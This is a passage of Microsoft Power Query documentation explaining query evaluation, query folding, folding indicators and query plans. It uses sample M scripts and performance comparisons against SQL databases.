the same transformation to multiple datasets. To extract all the previous steps into a
new query, right-click the first step you do not want to include in the query and select
Extract Previous.
Name the new query and select OK. To access the new query, navigate to the Queries
pane on the left side of the screen.

Edit step names and their descriptions


To edit the step, right-click the step and select Properties.
In the window, change the step name and description, then select OK to save the
changes.
Adding a description to a step adds a small icon next to the step to denote that the step
has a description. In Power Query Desktop, you can hover over this icon to display the
description as a tooltip.
In Power Query Online, the step description is included in the informational display that
appears when you hover over any of the steps in the applied steps list.


Global search box (Preview)
Article • 07/30/2022

The global search box offers you the ability to search for:

Queries found in your project.


Actions available in your version of Power Query that are commonly found in the
ribbon.
Get data connectors that can also be found through the Get Data dialog box.

The global search box is located at the top center of the Power Query editor. The search
box follows the same design principles that you find in Microsoft Search in Office , but
contextualized to Power Query.

Search results
To make use of the global search box, select the search box or press Alt + Q. Before you
enter anything, you'll be presented with some default options to choose from.
When you start entering something to search for, the results will be updated in real
time, displaying queries, actions, and get data connectors that match the text that
you've entered.

For scenarios where you'd like to see all available options for a given search query, you
can also select the See more results for option. This option is positioned as the last
result of the search box query when there are multiple matches to your query.

Overview of query evaluation and query
folding in Power Query
Article • 02/17/2023

This article provides a basic overview of how M queries are processed and turned into
data source requests.

Power Query M script


Any query, whether created by Power Query, manually written by you in the advanced
editor, or entered using a blank document, consists of functions and syntax from the
Power Query M formula language. This query gets interpreted and evaluated by the
Power Query engine to output its results. The M script serves as the set of instructions
needed to evaluate the query.

 Tip

You can think of the M script as a recipe that describes how to prepare your data.

The most common way to create an M script is by using the Power Query editor. For
example, when you connect to a data source, such as a SQL Server database, you'll
notice on the right-hand side of your screen that there's a section called applied steps.
This section displays all the steps or transforms used in your query. In this sense, the
Power Query editor serves as an interface to help you create the appropriate M script for
the transforms that you're after, and ensures that the code you use is valid.

7 Note

The M script is used in the Power Query editor to:

Display the query as a series of steps and allow the creation or modification of
new steps.
Display a diagram view.
The previous image emphasizes the applied steps section, which contains the following
steps:

Source: Makes the connection to the data source. In this case, it's a connection to a
SQL Server database.
Navigation: Navigates to a specific table in the database.
Removed other columns: Selects which columns from the table to keep.
Sorted rows: Sorts the table using one or more columns.
Kept top rows: Filters the table to only keep a certain number of rows from the top
of the table.

This set of step names is a friendly way to view the M script that Power Query has
created for you. There are several ways to view the full M script. In Power Query, you can
select Advanced Editor in the View tab. You can also select Advanced Editor from the
Query group in the Home tab. In some versions of Power Query, you can also change
the view of the formula bar to show the query script by going into the View tab and
from the Layout group, select Script view > Query script.
Most of the names found in the Applied steps pane are also being used as is in the M
script. Steps of a query are named using something called identifiers in the M language.
Sometimes extra characters are wrapped around step names in M, but these characters
aren’t shown in the applied steps. An example is #"Kept top rows" , which is categorized
as a quoted identifier because of these extra characters. A quoted identifier can be used
to allow any sequence of zero or more Unicode characters to be used as an identifier,
including keywords, whitespace, comments, operators, and punctuators. To learn more
about identifiers in the M language, go to lexical structure.

Any changes that you make to your query through the Power Query editor will
automatically update the M script for your query. For example, using the previous image
as the starting point, if you change the Kept top rows step name to be Top 20 rows, this
change will automatically be updated in the script view.
While we recommend that you use the Power Query editor to create all or most of the
M script for you, you can manually add or modify pieces of your M script. To learn more
about the M language, go to the official docs site for the M language.

7 Note

M script, also referred to as M code, is a term used for any code that uses the M
language. In the context of this article, M script also refers to the code found inside
a Power Query query and accessible through the advanced editor window or
through the script view in the formula bar.

Query evaluation in Power Query


The following diagram explores the process that occurs when a query is evaluated in
Power Query.
1. The M script, found inside the advanced editor, is submitted to the Power Query
engine. Other important information is also included, such as credentials and data
source privacy levels.
2. Power Query determines what data needs to be extracted from the data source
and submits a request to the data source.
3. The data source responds to the request from Power Query by transferring the
requested data to Power Query.
4. Power Query receives the incoming data from the data source and does any
transformations using the Power Query engine if necessary.
5. The results derived from the previous point are loaded to a destination.

7 Note

While this example showcases a query with a SQL Database as a data source, the
concept applies to queries with or without a data source.

When Power Query reads your M script, it runs the script through an optimization
process to more efficiently evaluate your query. In this process, it determines which
steps (transforms) from your query can be offloaded to your data source. It also
determines which other steps need to be evaluated using the Power Query engine. This
optimization process is called query folding, where Power Query tries to push as much of
the possible execution to the data source to optimize your query's execution.
) Important

All rules from the Power Query M formula language (also known as the M
language) are followed. Most notably, lazy evaluation plays an important role
during the optimization process. In this process, Power Query understands what
specific transforms from your query need to be evaluated. Power Query also
understands what other transforms don't need to be evaluated because they're not
needed in the output of your query.

Furthermore, when multiple sources are involved, the data privacy level of each
data source is taken into consideration when evaluating the query. More
information: Behind the scenes of the Data Privacy Firewall

The following diagram demonstrates the steps that take place in this optimization
process.

1. The M script, found inside the advanced editor, is submitted to the Power Query
engine. Other important information is also supplied, such as credentials and data
source privacy levels.
2. The Query folding mechanism submits metadata requests to the data source to
determine the capabilities of the data source, table schemas, relationships between
different entities at the data source, and more.
3. Based on the metadata received, the query folding mechanism determines what
information to extract from the data source and what set of transformations need
to happen inside the Power Query engine. It sends the instructions to two other
components that take care of retrieving the data from the data source and
transforming the incoming data in the Power Query engine if necessary.
4. Once the instructions have been received by the internal components of Power
Query, Power Query sends a request to the data source using a data source query.
5. The data source receives the request from Power Query and transfers the data to
the Power Query engine.
6. Once the data is inside Power Query, the transformation engine inside Power
Query (also known as mashup engine) does the transformations that couldn't be
folded back or offloaded to the data source.
7. The results derived from the previous point are loaded to a destination.

7 Note

Depending on the transformations and data source used in the M script, Power
Query determines if it will stream or buffer the incoming data.

Query folding overview


The goal of query folding is to offload or push as much of the evaluation of a query to a
data source that can compute the transformations of your query.

The query folding mechanism accomplishes this goal by translating your M script to a
language that can be interpreted and executed by your data source. It then pushes the
evaluation to your data source and sends the result of that evaluation to Power Query.

This operation often provides a much faster query execution than extracting all the
required data from your data source and running all transforms required in the Power
Query engine.

When you use the get data experience, Power Query guides you through the process
that ultimately lets you connect to your data source. When doing so, Power Query uses
a series of functions in the M language categorized as accessing data functions. These
specific functions use mechanisms and protocols to connect to your data source using a
language that your data source can understand.

However, the steps that follow in your query are the steps or transforms that the query
folding mechanism attempts to optimize. It then checks if they can be offloaded to your
data source instead of being processed using the Power Query engine.

) Important
All data source functions, commonly shown as the Source step of a query, queries
the data at the data source in its native language. The query folding mechanism is
utilized on all transforms applied to your query after your data source function so
they can be translated and combined into a single data source query or as many
transforms that can be offloaded to the data source.

Depending on how the query is structured, there could be three possible outcomes to
the query folding mechanism:

Full query folding: When all of your query transformations get pushed back to the
data source and minimal processing occurs at the Power Query engine.
Partial query folding: When only a few transformations in your query, and not all,
can be pushed back to the data source. In this case, only a subset of your
transformations is done at your data source and the rest of your query
transformations occur in the Power Query engine.
No query folding: When the query contains transformations that can't be
translated to the native query language of your data source, either because the
transformations aren't supported or the connector doesn't support query folding.
For this case, Power Query gets the raw data from your data source and uses the
Power Query engine to achieve the output you want by processing the required
transforms at the Power Query engine level.

7 Note

The query folding mechanism is primarily available in connectors for structured


data sources such as, but not limited to, Microsoft SQL Server and OData Feed.
During the optimization phase, the engine might sometimes reorder steps in the
query.

Leveraging a data source that has more processing resources and has query folding
capabilities can expedite your query loading times as the processing occurs at the
data source and not at the Power Query engine.

Next steps
For detailed examples of the three possible outcomes of the query folding mechanism,
go to Query folding examples.

For information about query folding indicators found in the Applied Steps pane, go to
Query folding indicators
Power Query query folding
Article • 08/31/2022

This article targets data modelers developing models in Power Pivot or Power BI
Desktop. It describes what Power Query query folding is, and why it's important in your
data model designs. This article also describes the data sources and transformations that
can achieve query folding, and how to determine that your Power Query queries can be
folded—whether fully or partially.

Query folding is the ability for a Power Query query to generate a single query
statement to retrieve and transform source data. The Power Query mashup engine
strives to achieve query folding whenever possible for reasons of efficiency.

Query folding is an important topic for data modeling for several reasons:

Import model tables: Data refresh will take place efficiently for Import model
tables (Power Pivot or Power BI Desktop), in terms of resource utilization and
refresh duration.
DirectQuery and Dual storage mode tables: Each DirectQuery and Dual storage
mode table (Power BI only) must be based on a Power Query query that can be
folded.
Incremental refresh: Incremental data refresh (Power BI only) will be efficient, in
terms of resource utilization and refresh duration. In fact, the Power BI Incremental
Refresh configuration window will notify you of a warning should it determine that
query folding for the table can't be achieved. If it can't be achieved, the goal of
incremental refresh is defeated. The mashup engine would then be required to
retrieve all source rows, and then apply filters to determine incremental changes.

Query folding may occur for an entire Power Query query, or for a subset of its steps.
When query folding cannot be achieved—either partially or fully—the Power Query
mashup engine must compensate by processing data transformations itself. This process
can involve retrieving source query results, which for large datasets is very resource
intensive and slow.

We recommend that you strive to achieve efficiency in your model designs by ensuring
query folding occurs whenever possible.

Sources that support folding


Most data sources that have the concept of a query language support query folding.
These data sources can include relational databases, OData feeds (including SharePoint
lists), Exchange, and Active Directory. However, data sources like flat files, blobs, and
web typically do not.

Transformations that can achieve folding


Relational data source transformations that can be query folded are those that can be
written as a single SELECT statement. A SELECT statement can be constructed with
appropriate WHERE, GROUP BY, and JOIN clauses. It can also contain column
expressions (calculations) that use common built-in functions supported by SQL
databases.

Generally, the following list describes transformations that can be query folded.

Removing columns.

Renaming columns (SELECT column aliases).

Filtering rows, with static values or Power Query parameters (WHERE clause
predicates).

Grouping and summarizing (GROUP BY clause).

Expanding record columns (source foreign key columns) to achieve a join of two
source tables (JOIN clause).

Non-fuzzy merging of fold-able queries based on the same source (JOIN clause).

Appending fold-able queries based on the same source (UNION ALL operator).

Adding custom columns with simple logic (SELECT column expressions). Simple
logic implies uncomplicated operations, possibly including the use of M functions
that have equivalent functions in the SQL data source, like mathematic or text
manipulation functions. For example, the following expressions return the year
component of the OrderDate column value (to return a numeric value).

Power Query M

Date.Year([OrderDate])

Pivoting and unpivoting (PIVOT and UNPIVOT operators).

Transformations that prevent folding


Generally, the following list describes transformations that prevent query folding. This
list isn't intended to be an exhaustive list.

Merging queries based on different sources.

Appending (union-ing) queries based on different sources.

Adding custom columns with complex logic. Complex logic implies the use of M
functions that have no equivalent functions in the data source. For example, the
following expressions format the OrderDate column value (to return a text value).

Power Query M

Date.ToText([OrderDate], "yyyy")

Adding index columns.

Note that when a Power Query query encompasses multiple data sources,
incompatibility of data source privacy levels can prevent query folding from taking
place. For more information, see the Power BI Desktop privacy levels article.

Determine when a query can be folded


In the Power Query Editor window, it's possible to determine when a Power Query query
can be folded. In the Query Settings pane, when you right-click the last applied step, if
the View Native Query option is enabled (not greyed out), then the entire query can be
folded.
7 Note

The View Native Query option is only available for certain relational DB/SQL
generating connectors. It doesn't work for OData based connectors, for example,
even though there is folding occurring on the backend. The Query Diagnostics
feature is the best way to see what folding has occurred for non-SQL connectors
(although the steps that fold aren't explicitly called out—you just see the resulting
URL that was generated).

To view the folded query, you select the View Native Query option. You're then be
presented with the native query that Power Query will use to source data.
If the View Native Query option isn't enabled (greyed out), this is evidence that not all
query steps can be folded. However, it could mean that a subset of steps can still be
folded. Working backwards from the last step, you can check each step to see if the
View Native Query option is enabled. If so, then you've learned where, in the sequence
of steps, that query folding could no longer be achieved.
Next steps
For more information about query folding and related articles, check out the following
resources:

Overview of query evaluation and query folding in Power Query


Query folding guidance in Power BI Desktop
Query folding examples
Query folding indicators
Query plan for Power Query
Query folding on native queries
Query folding examples
Article • 08/31/2022

This article provides some example scenarios for each of the three possible outcomes
for query folding. It also includes some suggestions on how to get the most out of the
query folding mechanism, and the effect that it can have in your queries.

The scenario
Imagine a scenario where, using the Wide World Importers database for Azure Synapse
Analytics SQL database, you're tasked with creating a query in Power Query that
connects to the fact_Sale table and retrieves the last 10 sales with only the following
fields:

Sale Key
Customer Key
Invoice Date Key
Description
Quantity

7 Note

For demonstration purposes, this article uses the database outlined on the tutorial
on loading the Wide World Importers database into Azure Synapse Analytics. The
main difference in this article is the fact_Sale table only holds data for the year
2000, with a total of 3,644,356 rows.

While the results might not exactly match the results that you get by following the
tutorial from the Azure Synapse Analytics documentation, the goal of this article is
to showcase the core concepts and impact that query folding can have in your
queries.
This article showcases three ways to achieve the same output with different levels of
query folding:

No query folding
Partial query folding
Full query folding

No query folding example

) Important

Queries that rely solely on unstructured data sources or that don't have a compute
engine, such as CSV or Excel files, don't have query folding capabilities. This means
that Power Query evaluates all the required data transformations using the Power
Query engine.

After connecting to your database and navigating to the fact_Sale table, you select the
Keep bottom rows transform found inside the Reduce rows group of the Home tab.

After selecting this transform, a new dialog appears. In this new dialog, you can enter
the number of rows that you'd like to keep. For this case, enter the value 10, and then
select OK.
 Tip

For this case, performing this operation yields the result of the last ten sales. In
most scenarios, we recommend that you provide a more explicit logic that defines
which rows are considered last by applying a sort operation on the table.

Next, select the Choose columns transform found inside the Manage columns group of
the Home tab. You can then select the columns you want to keep from your table and
remove the rest.

Lastly, inside the Choose columns dialog, select the Sale Key , Customer Key , Invoice
Date Key , Description , and Quantity columns, and then select OK.
The following code sample is the full M script for the query you created:

Power Query M

let
Source = Sql.Database(ServerName, DatabaseName),
Navigation = Source{[Schema = "wwi", Item = "fact_Sale"]}[Data],
#"Kept bottom rows" = Table.LastN(Navigation, 10),
#"Choose columns" = Table.SelectColumns(#"Kept bottom rows", {"Sale Key",
"Customer Key", "Invoice Date Key", "Description", "Quantity"})
in
#"Choose columns""

No query folding: Understanding the query evaluation


Under Applied steps in the Power Query editor, you’ll notice that the query folding
indicators for Kept bottom rows and Choose columns are marked as steps that will be
evaluated outside the data source or, in other words, by the Power Query engine.
You can right-click the last step of your query, the one named Choose columns, and
select the option that reads View Query plan. The goal of the query plan is to provide
you with a detailed view of how your query is run. To learn more about this feature, go
to Query plan.

Each box in the previous image is called a node. A node represents the operation
breakdown to fulfill this query. Nodes that represent data sources, such as SQL Server in
the example above and the Value.NativeQuery node, represent which part of the query
is offloaded to the data source. The rest of the nodes, in this case Table.LastN and
Table.SelectColumns highlighted in the rectangle in the previous image, are evaluated
by the Power Query engine. These two nodes represent the two transforms that you
added, Kept bottom rows and Choose columns. The rest of the nodes represent
operations that happen at your data source level.

To see the exact request that is sent to your data source, select View details in the
Value.NativeQuery node.
This data source request is in the native language of your data source. For this case, that
language is SQL and this statement represents a request for all the rows and fields from
the fact_Sale table.

Consulting this data source request can help you better understand the story that the
query plan tries to convey:

Sql.Database : This node represents the data source access. Connects to the
database and sends metadata requests to understand its capabilities.
Value.NativeQuery : Represents the request that was generated by Power Query to
fulfill the query. Power Query submits the data requests in a native SQL statement
to the data source. In this case, that represents all records and fields (columns)
from the fact_Sale table. For this scenario, this case is undesirable, as the table
contains millions of rows and the interest is only in the last 10.
Table.LastN : Once Power Query receives all records from the fact_Sale table, it
uses the Power Query engine to filter the table and keep only the last 10 rows.
Table.SelectColumns : Power Query will use the output of the Table.LastN node
and apply a new transform called Table.SelectColumns , which selects the specific
columns that you want to keep from a table.

For its evaluation, this query had to download all rows and fields from the fact_Sale
table. This query took an average of 6 minutes and 1 second to be processed in a
standard instance of Power BI dataflows (which accounts for the evaluation and loading
of data to dataflows).

Partial query folding example


After connecting to the database and navigating to the fact_Sale table, you start by
selecting the columns that you want to keep from your table. Select the Choose
columns transform found inside the Manage columns group from the Home tab. This
transform helps you to explicitly select the columns that you want to keep from your
table and remove the rest.

Inside the Choose columns dialog, select the Sale Key , Customer Key , Invoice Date
Key , Description , and Quantity columns and then select OK.
You now create logic that will sort the table to have the last sales at the bottom of the
table. Select the Sale Key column, which is the primary key and incremental sequence
or index of the table. Sort the table using only this field in ascending order from the
context menu for the column.

Next, select the table contextual menu and choose the Keep bottom rows transform.
In Keep bottom rows, enter the value 10, and then select OK.

The following code sample is the full M script for the query you created:

Power Query M

let
Source = Sql.Database(ServerName, DatabaseName),
Navigation = Source{[Schema = "wwi", Item = "fact_Sale"]}[Data],
#"Choose columns" = Table.SelectColumns(Navigation, {"Sale Key", "Customer
Key", "Invoice Date Key", "Description", "Quantity"}),
#"Sorted rows" = Table.Sort(#"Choose columns", {{"Sale Key",
Order.Ascending}}),
#"Kept bottom rows" = Table.LastN(#"Sorted rows", 10)
in
#"Kept bottom rows"

Partial query folding example: Understanding the query


evaluation
Checking the applied steps pane, you notice that the query folding indicators are
showing that the last transform that you added, Kept bottom rows , is marked as a step
that will be evaluated outside the data source or, in other words, by the Power Query
engine.

You can right-click the last step of your query, the one named Kept bottom rows , and
select the Query plan option to better understand how your query might be evaluated.
Each box in the previous image is called a node. A node represents every process that
needs to happen (from left to right) in order for your query to be evaluated. Some of
these nodes can be evaluated at your data source while others, like the node for
Table.LastN , represented by the Kept bottom rows step, are evaluated using the Power

Query engine.

To see the exact request that is sent to your data source, select View details in the
Value.NativeQuery node.
This request is in the native language of your data source. For this case, that language is
SQL and this statement represents a request for all the rows, with only the requested
fields from the fact_Sale table ordered by the Sale Key field.

Consulting this data source request can help you better understand the story that the
full query plan tries to convey. The order of the nodes is a sequential process that starts
by requesting the data from your data source:

Sql.Database : Connects to the database and sends metadata requests to


understand its capabilities.
Value.NativeQuery : Represents the request that was generated by Power Query to
fulfill the query. Power Query submits the data requests in a native SQL statement
to the data source. For this case, that represents all records, with only the
requested fields from the fact_Sale table in the database sorted in ascending
order by the Sales Key field.
Table.LastN : Once Power Query receives all records from the fact_Sale table, it
uses the Power Query engine to filter the table and keep only the last 10 rows.

For its evaluation, this query had to download all rows and only the required fields from
the fact_Sale table. It took an average of 3 minutes and 4 seconds to be processed in a
standard instance of Power BI dataflows (which accounts for the evaluation and loading
of data to dataflows).
Full query folding example
After connecting to the database and navigating to the fact_Sale table, start by
selecting the columns that you want to keep from your table. Select the Choose
columns transform found inside the Manage columns group from the Home tab. This
transform helps you to explicitly select the columns that you want to keep from your
table and remove the rest.

In Choose columns, select the Sale Key , Customer Key , Invoice Date Key , Description ,
and Quantity columns, and then select OK.
You now create logic that will sort the table to have the last sales at the top of the table.
Select the Sale Key column, which is the primary key and incremental sequence or
index of the table. Sort the table only using this field in descending order from the
context menu for the column.

Next, select the table contextual menu and choose the Keep top rows transform.
In Keep top rows, enter the value 10, and then select OK.

The following code sample is the full M script for the query you created:

Power Query M
let
Source = Sql.Database(ServerName, DatabaseName),
Navigation = Source{[Schema = "wwi", Item = "fact_Sale"]}[Data],
#"Choose columns" = Table.SelectColumns(Navigation, {"Sale Key", "Customer
Key", "Invoice Date Key", "Description", "Quantity"}),
#"Sorted rows" = Table.Sort(#"Choose columns", {{"Sale Key",
Order.Descending}}),
#"Kept top rows" = Table.FirstN(#"Sorted rows", 10)
in
#"Kept top rows"

Full query folding example: Understanding the query


evaluation
When checking the applied steps pane, you'll notice that the query folding indicators
are showing that the transforms that you added, Choose columns, Sorted rows, and
Kept top rows, are marked as steps that will be evaluated at the data source.

You can right-click the last step of your query, the one named Kept top rows, and select
the option that reads Query plan.
This request is in the native language of your data source. For this case, that language is
SQL and this statement represents a request for all the rows and fields from the
fact_Sale table.

Consulting this data source query can help you better understand the story that the full
query plan tries to convey:

Sql.Database : Connects to the database and sends metadata requests to

understand its capabilities.


Value.NativeQuery : Represents the request that was generated by Power Query to
fulfill the query. Power Query submits the data requests in a native SQL statement
to the data source. For this case, that represents a request for only the top 10
records of the fact_Sale table, with only the required fields after being sorted in
descending order using the Sale Key field.

7 Note

While there's no clause that can be used to SELECT the bottom rows of a table in
the T-SQL language, there's a TOP clause that retrieves the top rows of a table.
For its evaluation, this query only downloads 10 rows, with only the fields that you
requested from the fact_Sale table. This query took an average of 31 seconds to be
processed in a standard instance of Power BI dataflows (which accounts for the
evaluation and loading of data to dataflows).

Performance comparison
To better understand the affect that query folding has in these queries, you can refresh
your queries, record the time it takes to fully refresh each query, and compare them. For
simplicity, this article provides the average refresh timings captured using the Power BI
dataflows refresh mechanic while connecting to a dedicated Azure Synapse Analytics
environment with DW2000c as the service level.

The refresh time for each query was as follows:

Example Label Time in seconds

No query folding None 361

Partial query folding Partial 184

Full query folding Full 31

It's often the case that a query that fully folds back to the data source outperforms
similar queries that don't completely fold back to the data source. There could be many
reasons why this is the case. These reasons range from the complexity of the transforms
that your query performs, to the query optimizations implemented at your data source,
such as indexes and dedicated computing, and network resources. Still, there are two
specific key processes that query folding tries to use that minimizes the affect that both
of these processes have with Power Query:

Data in transit
Transforms executed by the Power Query engine

The following sections explain the affect that these two processes have in the previously
mentioned queries.

Data in transit
When a query gets executed, it tries to fetch the data from the data source as one of its
first steps. What data is fetched from the data source is defined by the query folding
mechanism. This mechanism identifies the steps from the query that can be offloaded to
the data source.

The following table lists the number of rows requested from the fact_Sale table of the
database. The table also includes a brief description of the SQL statement sent to
request such data from the data source.

Example Label Rows Description


requested

No None 3644356 Request for all fields and all records from the fact_Sale table
query
folding

Partial Partial 3644356 Request for all records, but only required fields from the
query fact_Sale table after it was sorted by the Sale Key field
folding

Full Full 10 Request for only the required fields and the TOP 10 records of
query the fact_Sale table after being sorted in descending order by
folding the Sale Key field
When requesting data from a data source, the data source needs to compute the results
for the request and then send the data to the requestor. While the computing resources
have already been mentioned, the network resources of moving the data from the data
source to Power Query, and then have Power Query be able to effectively receive the
data and prepare it for the transforms that will happen locally can take some time
depending on the size of the data.

For the showcased examples, Power Query had to request over 3.6 million rows from the
data source for the no query folding and partial query folding examples. For the full
query folding example, it only requested 10 rows. For the fields requested, the no query
folding example requested all the available fields from the table. Both the partial query
folding and the full query folding examples only submitted a request for exactly the
fields that they needed.

U Caution

We recommend that you implement incremental refresh solutions that leverage


query folding for queries or entities with large amounts of data. Different product
integrations of Power Query implement timeouts to terminate long running
queries. Some data sources also implement timeouts on long running sessions,
trying to execute expensive queries against their servers. More information: Using
incremental refresh with dataflows and Incremental refresh for datasets

Transforms executed by the Power Query engine


This article showcased how you can use the Query plan to better understand how your
query might be evaluated. Inside the query plan, you can see the exact nodes of the
transform operations that will be performed by the Power Query engine.

The following table showcases the nodes from the query plans of the previous queries
that would have been evaluated by the Power Query engine.

Example Label Power Query engine transform nodes

No query folding None Table.LastN , Table.SelectColumns

Partial query folding Partial Table.LastN

Full query folding Full —

For the examples showcased in this article, the full query folding example doesn't
require any transforms to happen inside the Power Query engine as the required output
table comes directly from the data source. In contrast, the other two queries required
some computation to happen at the Power Query engine. Because of the amount of
data that needs to be processed by these two queries, the process for these examples
takes more time than the full query folding example.

Transforms can be grouped into the following categories:

Type of Description
Operator

Remote Operators that are data source nodes. The evaluation of these operators occurs
outside of Power Query.
Type of Description
Operator

Streaming Operators are pass-through operators. For example, Table.SelectRows with a simple
filter can usually filter the results as they pass through the operator, and won’t need
to gather all rows before moving the data. Table.SelectColumns and
Table.ReorderColumns are other examples of these sort of operators.

Full scan Operators that need to gather all the rows before the data can move on to the next
operator in the chain. For example, to sort data, Power Query needs to gather all the
data. Other examples of full scan operators are Table.Group , Table.NestedJoin , and
Table.Pivot .

 Tip

While not every transform is the same from a performance standpoint, in most
cases, having fewer transforms is usually better.

Considerations and suggestions


Follow the best practices when creating a new query, as stated in Best practices in
Power Query.
Use the query folding indicators to check which steps are preventing your query
from folding. Reorder them if necessary to increase folding.
Use the query plan to determine which transforms are happening at the Power
Query engine for a particular step. Consider modifying your existing query by re-
arranging your steps. Then check the query plan of the last step of your query
again and see if the query plan looks better than the previous one. For example,
the new query plan has less nodes than the previous one, and most of the nodes
are “Streaming” nodes and not “full scan”. For data sources that support folding,
any nodes in the query plan other than Value.NativeQuery and data source access
nodes represent transforms that didn’t fold.
When available, you can use the View Native Query (or View data source query)
option to ensure that your query can be folded back to the data source. If this
option is disabled for your step, and you're using a source that normally enables it,
you've created a step that stops query folding. If you're using a source that doesn't
support this option, you can rely on the query folding indicators and query plan.
Use the query diagnostics tools to better understand the requests being sent to
your data source when query folding capabilities are available for the connector.
When combining data sourced from the use of multiple connectors, Power Query
tries to push as much work as possible to both of the data sources while
complying with the privacy levels defined for each data source.
Read the article on privacy levels to protect your queries from running against a
Data Privacy Firewall error.
Use other tools to check query folding from the perspective of the request being
received by the data source. Based on the example in this article, you can use the
Microsoft SQL Server Profiler to check the requests being sent by Power Query and
received by the Microsoft SQL Server.
If you add a new step to a fully folded query and the new step also folds, Power
Query might send a new request to the data source instead of using a cached
version of the previous result. In practice, this process can result in seemingly
simple operations on a small amount of data taking longer to refresh in the
preview than expected. This longer refresh is due to Power Query requerying the
data source rather than working off a local copy of the data.
Query folding indicators
Article • 02/17/2023

7 Note

Before reading this article, we recommended that you read Overview of query
evaluation and query folding in Power Query to better understand how folding
works in Power Query.

Query folding indicators help you understand the steps that fold or don't fold.

With query folding indicators, it becomes obvious when you make a change that breaks
folding. This feature helps you to more easily resolve issues quickly, avoid performance
issues in the first place, and have better insight into your queries. In most cases you run
into, steps will fold or won't fold. But there are many cases where the outcome isn't as
obvious, and these cases are discussed in Step diagnostics indicators (Dynamic, Opaque,
and Unknown).

7 Note

The query folding indicators feature is available only for Power Query Online.

Interpreting query folding diagnostics


When you examine the query folding indicator next to a step, the most important thing
to understand is that the diagnostic state isn't sequential. In other words, the indicator
for that step describes whether the query as a whole, up to that point, folds or not. If
you have an indicator that shows that the query doesn't fold, followed by an indicator
that shows it does fold, it means that your query up to that point does fold.

This interpretation works even with a simple query against a SQL source. For example,
using the AdventureWorks sample database, connect to the Production.Product table
and load data. Loading this sample through the Power Query navigator gives the
following query:

Power Query M

let
Source = Sql.Database("ServerName", "AdventureWorks"),
Navigation = Source{[Schema = "Production", Item = "Product"]}[Data]
in
Navigation

If you examine how this code shows up in query folding indicators, you'll note that the
first step is inconclusive. But the second step does fold, which means that the query up
to that point does fold.

In this example, the initial steps can't be confirmed to fold (is inconclusive), but the final
step generated when you load data initially does fold. How the first steps (Source, and
sometimes other Navigation steps) are handled depends on the connector. With SQL,
for example, it's handled as a catalog table value, which doesn't fold. However, as soon
as you select data for that connector, it will fold.

Conversely, this can also mean that your query folds up to a point and then stops
folding. Unlike in the case where you have a folding indicator for the step that shows
that everything folds, when you have a not-folding indicator it doesn't mean that
everything doesn't fold. Instead, it means that "not everything" folds. Generally,
everything up to the last folding indicator will fold, with more operations happening
after.

Modifying the example from above, you can give a transform that never folds—
Capitalize Each Word.

Power Query M

let
Source = Sql.Database("ServerName", "AdventureWorks"),
Navigation = Source{[Schema = "Production", Item = "Product"]}[Data],
#"Capitalized each word" = Table.TransformColumns(Navigation, {{"Name",
each Text.Proper(_), type text}})
in
#"Capitalized each word"

In the query folding indicators, you have the same indicators as above, except the final
step doesn't fold. Everything up to this final step will be performed on the data source,
while the final step will be performed locally.
Step diagnostics indicators
Query folding indicators use an underlying query plan, and require it to be able to get
information about the query to report it. Currently the query plan only supports tables,
so some cases (lists, records, primitives) won't report as folding or not. Similarly,
constant tables report as opaque.

Indicator Icon Description

Folding The folding indicator tells you that the query up to this step will be evaluated
by the data source.

Not The not-folding indicator tells you that some part of the query up to this step
folding will be evaluated outside the data source. You can compare it with the last
folding indicator, if there is one, to see if you can rearrange your query to be
more performant.

Might Might fold indicators are uncommon. They mean that a query "might" fold.
fold They indicate either that folding or not folding will be determined at runtime,
when pulling results from the query, and that the query plan is dynamic. These
indicators will likely only appear with ODBC or OData connections.

Opaque Opaque indicators tell you that the resulting query plan is inconclusive for
some reason. It generally indicates that there's a true "constant" table, or that
that transform or connector isn't supported by the indicators and query plan
tool.

Unknown Unknown indicators represent an absence of a query plan, either due to an


error or attempting to run the query plan evaluation on something other than
a table (such as a record, list, or primitive).

Example analysis
For an example analysis, start by connecting to the Production.Product table in
Adventure Works (SQL). The initial load, similar to the example above, looks like the
following image.
Adding more steps that fold will extend that green line on the right side. This extension
occurs because this step also folds.

Adding a step that doesn't fold displays a different indicator. For example, Capitalize
each word never folds. The indicator changes, showing that as of this step, it's stopped
folding. As mentioned earlier, the previous steps will still fold.

Adding more steps downstream that depend on Capitalize each step will continue to
not fold.

However, if you remove the column you applied the capitalization to so that the
optimized query plan can all fold once more, you'll get a result like the following image.
However, something like this is uncommon. This image illustrates how it's not just the
order of steps, but the actual transformations that apply as well.
Query plan for Power Query (Preview)
Article • 02/17/2023

Query plan for Power Query is a feature that provides a better view of your query's
evaluation. It's useful to help determine why a particular query might not fold at a
particular step.

Through a practical example, this article will demonstrate the main use case and
potential benefits of using the query plan feature to review your query steps. The
examples used in this article have been created using the AdventureWorksLT sample
database for Azure SQL Server, which you can download from AdventureWorks sample
databases.

7 Note

The query plan feature for Power Query is only available in Power Query Online.

This article has been divided in a series of recommended steps in order to interpret the
query plan. These steps are:

1. Review the query folding indicators.


2. Select the query step to review its query plan.
3. Implement changes to your query.

Use the following steps to create the query in your own Power Query Online
environment.

1. From Power Query - Choose data source, select Blank query.

2. Replace the blank query's script with the following query.

Power Query M
let
Source = Sql.Database("servername", "database"),
Navigation = Source{[Schema = "Sales", Item = "SalesOrderHeader"]}
[Data],
#"Removed other columns" = Table.SelectColumns(Navigation,
{"SalesOrderID", "OrderDate", "SalesOrderNumber",
"PurchaseOrderNumber", "AccountNumber", "CustomerID", "TotalDue"}),
#"Filtered rows" = Table.SelectRows(#"Removed other columns", each
[TotalDue] > 1000),
#"Kept bottom rows" = Table.LastN(#"Filtered rows", 5)
in
#"Kept bottom rows"

3. Change servername and database with the correct names for your own
environment.

4. (Optional) If you're trying to connect to a server and database for an on-premises


environment, be sure to configure a gateway for that environment.

5. Select Next.

6. In the Power Query Editor, select Configure connection and provide the
credentials to your data source.

7 Note

For more information about connecting to a SQL Server, go to SQL Server


database.

After following these steps, your query will look like the one in the following image.

This query connects to the SalesOrderHeader table, and selects a few columns from the
last five orders with a TotalDue value above 1000.
7 Note

This article uses a simplified example to showcase this feature, but the concepts
described in this article apply to all queries. We recommend that you have a good
knowledge of query folding before reading the query plan. To learn more about
query folding, go to Query folding basics.

1. Review the query folding indicators

7 Note

Before reading this section, we recommend that you review the article on Query
folding indicators.

Your first step in this process is to review your query and pay close attention to the
query folding indicators. The goal is to review the steps that are marked as not folded.
Then you can see if making changes to the overall query could make those
transformations fold completely.

For this example, the only step that can't be folded is Kept bottom rows, which is easy
to identify through the not folded step indicator. This step is also the last step of the
query.

